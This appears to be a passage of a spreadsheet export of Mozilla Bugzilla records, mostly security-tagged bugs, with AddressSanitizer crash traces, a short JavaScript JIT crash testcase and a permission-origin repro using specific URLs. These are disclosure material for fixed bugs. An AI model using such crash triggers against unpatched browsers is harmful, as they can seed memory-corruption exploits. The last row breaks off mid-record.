    #26 0x7effab971ba7 in nsScriptLoader::EvaluateScript(nsScriptLoadRequest*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptLoader.cpp:2037:12
    #27 0x7effab96e9fa in nsScriptLoader::ProcessRequest(nsScriptLoadRequest*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptLoader.cpp:1836:10
    #28 0x7effab9582ee in nsScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptLoader.cpp:1574:10
    #29 0x7effab954a82 in nsScriptElement::MaybeProcessScript() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptElement.cpp:141:10
    #30 0x7effaaa7ced4 in AttemptToExecute /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsIScriptElement.h:222:18
    #31 0x7effaaa7ced4 in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:664
    #32 0x7effaaa7b6a1 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:488:7
    #33 0x7effaaa7fefb in nsHtml5ExecutorFlusher::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5StreamParser.cpp:128:9
    #34 0x7effa8a9c6b6 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1068:7
    #35 0x7effa8b1aa9c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #36 0x7effa986e4ef in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:100:21
    #37 0x7effa97e31f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #38 0x7effa97e31f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #39 0x7effa97e31f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #40 0x7effaf2f449f in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #41 0x7effb139c587 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:851:12
    #42 0x7effa97e31f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #43 0x7effa97e31f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #44 0x7effa97e31f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #45 0x7effb139bc23 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:681:7
    #46 0x4dfb2b in content_process_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:224:19
    #47 0x4dfb2b in main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:357
    #48 0x7effc3ef982f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/bmp/nsBMPEncoder.cpp:435:19 in ConvertHostARGBRow
Shadow bytes around the buggy address:
  0x0c048003bd90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c048003bda0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c048003bdb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c048003bdc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c048003bdd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c048003bde0: fa fa fa fa fa fa fa fa fa fa 00 00[fa]fa fd fd
  0x0c048003bdf0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c048003be00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c048003be10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c048003be20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c048003be3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8279==ABORTING</t>
        </is>
      </c>
      <c r="X1673" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1674">
      <c r="A1674" t="n">
        <v>766304</v>
      </c>
      <c r="B1674" t="inlineStr">
        <is>
          <t>2012-06-19 14:15:10 -0700</t>
        </is>
      </c>
      <c r="C1674" t="inlineStr">
        <is>
          <t>ScopedGfxFeatureReporter uses preference service off the main thread</t>
        </is>
      </c>
      <c r="D1674" t="inlineStr">
        <is>
          <t>2016-01-06 14:19:38 -0800</t>
        </is>
      </c>
      <c r="E1674" t="n">
        <v>1</v>
      </c>
      <c r="F1674" t="n">
        <v>1</v>
      </c>
      <c r="G1674" t="n">
        <v>3</v>
      </c>
      <c r="H1674" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1674" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1674" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K1674" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1674" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M1674" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1674" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1674" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1674" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q1674" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1674" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1674" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T1674" t="n">
        <v>1</v>
      </c>
      <c r="U1674" t="n">
        <v>0</v>
      </c>
      <c r="V1674" t="n">
        <v>8</v>
      </c>
      <c r="W1674" t="inlineStr">
        <is>
          <t>Created attachment 634585
patch
seeing this in the log:
I/Gecko   (  890): ###!!! ASSERTION: Using observer service off the main thread!: 'Error', file /home/blassey/src/mozilla-central/xpcom/ds/nsObserverService.cpp, line 95
not seeing it with this patch</t>
        </is>
      </c>
      <c r="X1674" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1675">
      <c r="A1675" t="n">
        <v>937697</v>
      </c>
      <c r="B1675" t="inlineStr">
        <is>
          <t>2013-11-12 09:30:33 -0800</t>
        </is>
      </c>
      <c r="C1675" t="inlineStr">
        <is>
          <t>Dangerous crash on Heap, possibly near [@ js::jit::CharCodeAt]</t>
        </is>
      </c>
      <c r="D1675" t="inlineStr">
        <is>
          <t>2016-02-07 17:21:46 -0800</t>
        </is>
      </c>
      <c r="E1675" t="n">
        <v>1</v>
      </c>
      <c r="F1675" t="n">
        <v>1</v>
      </c>
      <c r="G1675" t="n">
        <v>3</v>
      </c>
      <c r="H1675" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1675" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1675" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K1675" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1675" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1675" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1675" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1675" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1675" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q1675" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1675" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1675" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T1675" t="n">
        <v>1</v>
      </c>
      <c r="U1675" t="n">
        <v>0</v>
      </c>
      <c r="V1675" t="n">
        <v>26</v>
      </c>
      <c r="W1675" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 581d180a37f3 (run with --fuzzing-safe):
while (true) {
  foo("0");
}
function foo(s) {
  s.charAt(0);
  Number(s.charAt(-2147483648));
}</t>
        </is>
      </c>
      <c r="X1675" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1676">
      <c r="A1676" t="n">
        <v>462517</v>
      </c>
      <c r="B1676" t="inlineStr">
        <is>
          <t>2008-10-31 06:47:44 -0700</t>
        </is>
      </c>
      <c r="C1676" t="inlineStr">
        <is>
          <t>nsAsyncInstantiateEvent::Run() uses pointer comparison to check if old frame == new frame</t>
        </is>
      </c>
      <c r="D1676" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E1676" t="n">
        <v>1</v>
      </c>
      <c r="F1676" t="n">
        <v>1</v>
      </c>
      <c r="G1676" t="n">
        <v>6</v>
      </c>
      <c r="H1676" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1676" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1676" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K1676" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1676" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1676" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1676" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1676" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1676" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1676" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1676" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1676" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1676" t="n">
        <v>1</v>
      </c>
      <c r="U1676" t="n">
        <v>0</v>
      </c>
      <c r="V1676" t="n">
        <v>32</v>
      </c>
      <c r="W1676" t="inlineStr">
        <is>
          <t>The new frame may be located exactly in the same place in the memory (especially 
because of frame arena) and that is why frame == mFrame looks pretty scary.
There is a flush just before the check and that could run scripts or do whatever.
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/content/base/src/nsObjectLoadingContent.cpp&amp;rev=1.88&amp;mark=135-137#124
Timeless has a stack trace which *might* be related to this problem.</t>
        </is>
      </c>
      <c r="X1676" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1677">
      <c r="A1677" t="n">
        <v>1669466</v>
      </c>
      <c r="B1677" t="inlineStr">
        <is>
          <t>2020-10-06 05:13:03 -0700</t>
        </is>
      </c>
      <c r="C1677" t="inlineStr">
        <is>
          <t>Heap use-after-free via ContentParent::RecvInitStreamFilter</t>
        </is>
      </c>
      <c r="D1677" t="inlineStr">
        <is>
          <t>2024-05-30 10:19:33 -0700</t>
        </is>
      </c>
      <c r="E1677" t="n">
        <v>1</v>
      </c>
      <c r="F1677" t="n">
        <v>1</v>
      </c>
      <c r="G1677" t="n">
        <v>3</v>
      </c>
      <c r="H1677" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1677" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J1677" t="inlineStr">
        <is>
          <t>Request Handling</t>
        </is>
      </c>
      <c r="K1677" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1677" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1677" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1677" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1677" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1677" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main83+][adv-esr78.5+]</t>
        </is>
      </c>
      <c r="Q1677" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1677" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1677" t="inlineStr">
        <is>
          <t>84 Branch</t>
        </is>
      </c>
      <c r="T1677" t="n">
        <v>1</v>
      </c>
      <c r="U1677" t="n">
        <v>0</v>
      </c>
      <c r="V1677" t="n">
        <v>30</v>
      </c>
      <c r="W1677" t="inlineStr">
        <is>
          <t>Created attachment 9179865
latest-stock-85713
# Introduction
While fuzzing ContentParent IPC with a slightly modified harness, I came across a very weird crash. Crash happens during xpcom shutdown, possibly due to refcounting a freed instance via a stale pointer.
# Steps
Used fuzzfetch to get latest release fuzzing build to reproduce on stock harness.
```
$ ./m-r-20201005120340-fuzzing-asan-opt/firefox latest-stock-85713
*** You are running in headless mode.
Running Fuzzer tests...
INFO: Seed: 1293591897
INFO: Loaded 1 modules   (1524233 inline 8-bit counters): 1524233 [0x7f76db165038, 0x7f76db2d9241),
INFO: Loaded 1 PC tables (1524233 PCs): 1524233 [0x7f76db2d9248,0x7f76dca1b2d8),
./m-r-20201005120340-fuzzing-asan-opt/firefox: Running 1 inputs 1 time(s) each.
Running: triage-2/latest-stock-85713
Executed triage-2/latest-stock-85713 in 0 ms
***
*** NOTE: fuzzing was not performed, you have only
***       executed the target code on a fixed set of inputs.
***
=================================================================
==560090==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000092a50 at pc 0x7f76d1282502 bp 0x7ffc50927ce0 sp 0x7ffc50927cd8
READ of size 8 at 0x604000092a50 thread T0 (MainThread)
    #0 0x7f76d1282501 in operator-- /builds/worker/workspace/obj-build/dist/include/nsISupportsImpl.h:321:34
    #1 0x7f76d1282501 in Release /builds/worker/checkouts/gecko/toolkit/components/extensions/webrequest/WebRequestService.h:46:3
    #2 0x7f76d1282501 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50:40
    #3 0x7f76d1282501 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381:36
    #4 0x7f76d1282501 in assign_assuming_AddRef /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:69:7
    #5 0x7f76d1282501 in operator= /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:168:5
    #6 0x7f76d1282501 in mozilla::ClearOnShutdown_Internal::PointerClearer&lt;RefPtr&lt;mozilla::extensions::WebRequestService&gt; &gt;::Shutdown() /builds/worker/workspace/obj-build/dist/include/mozilla/ClearOnShutdown.h:72:13
    #7 0x7f76c5846dad in mozilla::KillClearOnShutdown(mozilla::ShutdownPhase) /builds/worker/checkouts/gecko/xpcom/base/ClearOnShutdown.cpp:53:19
    #8 0x7f76c5ab3b6d in mozilla::ShutdownXPCOM(nsIServiceManager*) /builds/worker/checkouts/gecko/xpcom/build/XPCOMInit.cpp:662:5
    #9 0x7f76d176978d in ~ScopedXPCOM /builds/worker/checkouts/gecko/tools/fuzzing/interface/harness/FuzzerTestHarness.h:106:21
    #10 0x7f76d176978d in mozilla::_InitFuzzer::DeinitXPCOM() /builds/worker/checkouts/gecko/tools/fuzzing/interface/harness/FuzzerRunner.cpp:25:23
    #11 0x7f76e2351db6 in __run_exit_handlers (/usr/lib/libc.so.6+0x3fdb6)
    #12 0x7f76e2351f5d in exit (/usr/lib/libc.so.6+0x3ff5d)
    #13 0x55d833a9f4a5 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /builds/worker/checkouts/gecko/tools/fuzzing/libfuzzer/FuzzerDriver.cpp
    #14 0x7f76d176904f in mozilla::FuzzerRunner::Run(int*, char***) /builds/worker/checkouts/gecko/tools/fuzzing/interface/harness/FuzzerRunner.cpp:75:13
    #15 0x7f76d16aa57e in XREMain::XRE_mainStartup(bool*) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:3851:35
    #16 0x7f76d16bb268 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:4941:12
    #17 0x7f76d16bc0b3 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5008:21
    #18 0x55d833921f97 in do_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:217:22
    #19 0x55d833921f97 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:331:16
    #20 0x7f76e233a151 in __libc_start_main (/usr/lib/libc.so.6+0x28151)
    #21 0x55d833876309 in _start (/home/tunnelshade/workspace/firefox/m-r-20201005120340-fuzzing-asan-opt/firefox+0xa4309)
0x604000092a50 is located 0 bytes inside of 48-byte region [0x604000092a50,0x604000092a80)
freed by thread T0 (MainThread) here:
    #0 0x55d8338eea3d in free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3
    #1 0x7f76e2351db6 in __run_exit_handlers (/usr/lib/libc.so.6+0x3fdb6)
previously allocated by thread T0 (MainThread) here:
    #0 0x55d8338eecbd in malloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:145:3
    #1 0x55d833924dad in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7f76d125d20c in operator new /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7f76d125d20c in mozilla::extensions::WebRequestService::GetSingleton() /builds/worker/checkouts/gecko/toolkit/components/extensions/webrequest/WebRequestService.cpp:23:16
    #4 0x7f76d126c56c in mozilla::extensions::StreamFilterParent::Create(mozilla::dom::ContentParent*, unsigned long, nsTSubstring&lt;char16_t&gt; const&amp;) /builds/worker/checkouts/gecko/toolkit/components/extensions/webrequest/StreamFilterParent.cpp:116:18
    #5 0x7f76cd3d2a35 in mozilla::dom::ContentParent::RecvInitStreamFilter(unsigned long const&amp;, nsTString&lt;char16_t&gt; const&amp;, std::function&lt;void (mozilla::ipc::Endpoint&lt;mozilla::extensions::PStreamFilterChild&gt;&amp;&amp;)&gt;&amp;&amp;) /builds/worker/checkouts/gecko/dom/ipc/ContentParent.cpp:3903:3
    #6 0x7f76c710cd54 in mozilla::dom::PContentParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PContentParent.cpp:7626:57
    #7 0x7f76c529dbc3 in void mozilla::ipc::FuzzProtocol&lt;mozilla::dom::ContentParent&gt;(mozilla::dom::ContentParent*, unsigned char const*, unsigned long, nsTArray&lt;nsTString&lt;char&gt; &gt; const&amp;) /builds/worker/workspace/obj-build/dist/include/ProtocolFuzzer.h:99:18
    #8 0x7f76c529d038 in RunContentParentIPCFuzzing(unsigned char const*, unsigned long) /builds/worker/checkouts/gecko/dom/ipc/fuzztest/content_parent_ipc_libfuzz.cpp:27:3
    #9 0x55d833aafa2e in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /builds/worker/checkouts/gecko/tools/fuzzing/libfuzzer/FuzzerLoop.cpp:562:11
    #10 0x55d833a99d0e in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /builds/worker/checkouts/gecko/tools/fuzzing/libfuzzer/FuzzerDriver.cpp:301:6
    #11 0x55d833a9f441 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /builds/worker/checkouts/gecko/tools/fuzzing/libfuzzer/FuzzerDriver.cpp:802:9
    #12 0x7f76d176904f in mozilla::FuzzerRunner::Run(int*, char***) /builds/worker/checkouts/gecko/tools/fuzzing/interface/harness/FuzzerRunner.cpp:75:13
    #13 0x7f76d16aa57e in XREMain::XRE_mainStartup(bool*) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:3851:35
    #14 0x7f76d16bb268 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:4941:12
    #15 0x7f76d16bc0b3 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5008:21
    #16 0x55d833921f97 in do_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:217:22
    #17 0x55d833921f97 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:331:16
    #18 0x7f76e233a151 in __libc_start_main (/usr/lib/libc.so.6+0x28151)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/obj-build/dist/include/nsISupportsImpl.h:321:34 in operator--
Shadow bytes around the buggy address:
  0x0c088000a4f0: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
  0x0c088000a500: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
  0x0c088000a510: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 06
  0x0c088000a520: fa fa 00 00 00 00 00 06 fa fa 00 00 00 00 00 06
  0x0c088000a530: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fd
=&gt;0x0c088000a540: fa fa fd fd fd fd fd fa fa fa[fd]fd fd fd fd fd
  0x0c088000a550: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa
  0x0c088000a560: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c088000a570: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 00
  0x0c088000a580: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
  0x0c088000a590: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd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560090==ABORTING
```
# Speculative Root Cause
Ref counting on a stale reference to `WebRequestService` object during xpcom shutdown. I am not sure if this can be reproduced in a running browser instance and not just the fuzzing harness.</t>
        </is>
      </c>
      <c r="X1677" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1678">
      <c r="A1678" t="n">
        <v>1315083</v>
      </c>
      <c r="B1678" t="inlineStr">
        <is>
          <t>2016-11-03 12:51:49 -0700</t>
        </is>
      </c>
      <c r="C1678" t="inlineStr">
        <is>
          <t>Create custom MAR to switch Firefox XP/Vista users to ESR52</t>
        </is>
      </c>
      <c r="D1678" t="inlineStr">
        <is>
          <t>2017-12-19 11:39:56 -0800</t>
        </is>
      </c>
      <c r="E1678" t="n">
        <v>1</v>
      </c>
      <c r="F1678" t="n">
        <v>1</v>
      </c>
      <c r="G1678" t="n">
        <v>5</v>
      </c>
      <c r="H1678" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1678" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1678" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K1678" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1678" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1678" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1678" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1678" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1678" t="inlineStr"/>
      <c r="Q1678" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1678" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1678" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1678" t="n">
        <v>1</v>
      </c>
      <c r="U1678" t="n">
        <v>0</v>
      </c>
      <c r="V1678" t="n">
        <v>18</v>
      </c>
      <c r="W1678" t="inlineStr">
        <is>
          <t>XP and 32-bit OSX build will be desupported in 53.0. We need to switch these users to ESR 52 at some point.</t>
        </is>
      </c>
      <c r="X1678" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1679">
      <c r="A1679" t="n">
        <v>1366357</v>
      </c>
      <c r="B1679" t="inlineStr">
        <is>
          <t>2017-05-19 12:14:05 -0700</t>
        </is>
      </c>
      <c r="C1679" t="inlineStr">
        <is>
          <t>Media Capture and Streams API permission does not inherit requester's origin</t>
        </is>
      </c>
      <c r="D1679" t="inlineStr">
        <is>
          <t>2024-05-30 09:33:35 -0700</t>
        </is>
      </c>
      <c r="E1679" t="n">
        <v>1</v>
      </c>
      <c r="F1679" t="n">
        <v>1</v>
      </c>
      <c r="G1679" t="n">
        <v>3</v>
      </c>
      <c r="H1679" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1679" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1679" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K1679" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1679" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1679" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1679" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1679" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1679" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main59+]</t>
        </is>
      </c>
      <c r="Q1679" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1679" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1679" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T1679" t="n">
        <v>1</v>
      </c>
      <c r="U1679" t="n">
        <v>0</v>
      </c>
      <c r="V1679" t="n">
        <v>72</v>
      </c>
      <c r="W1679" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Steps to reproduce:
1. Go to https://vuln.shhnjk.com/iframer.php?url=//test.shhnjk.com/permission.html
2. Click any button says contains word "Cam"
Actual results:
Permission notification says "Unknown protocol" is requesting permission. If you click Geo button, permission inherits origin correctly so it says "test.shhnjk.com".
Expected results:
When Media Capture and Streams API permission is requested from data URL or Blob URL, Firefox does not inherits origin in the permission notification. If top documents is trusted to user and child frame (ads) is untrusted site which requests permission, "Unknow protocol" will not give clear idea to users (Normal user does not what protocol is). Therefore user might allow permission by trusting top document.
So it should inherit origin of requester like Geo location permmision does</t>
        </is>
      </c>
      <c r="X1679" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1680">
      <c r="A1680" t="n">
        <v>1436809</v>
      </c>
      <c r="B1680" t="inlineStr">
        <is>
          <t>2018-02-08 11:50:39 -0800</t>
        </is>
      </c>
      <c r="C1680" t="inlineStr">
        <is>
          <t>Sending websocket message with text and binary data corrupts binary data</t>
        </is>
      </c>
      <c r="D1680" t="inlineStr">
        <is>
          <t>2018-08-28 23:02:34 -0700</t>
        </is>
      </c>
      <c r="E1680" t="n">
        <v>1</v>
      </c>
      <c r="F1680" t="n">
        <v>1</v>
      </c>
      <c r="G1680" t="n">
        <v>3</v>
      </c>
      <c r="H1680" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1680" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1680" t="inlineStr">
        <is>
          <t>Networking: WebSockets</t>
        </is>
      </c>
      <c r="K1680" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L1680" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1680" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1680" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1680" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1680" t="inlineStr">
        <is>
          <t>[necko-triaged][adv-main60+]</t>
        </is>
      </c>
      <c r="Q1680" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1680" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1680" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T1680" t="n">
        <v>1</v>
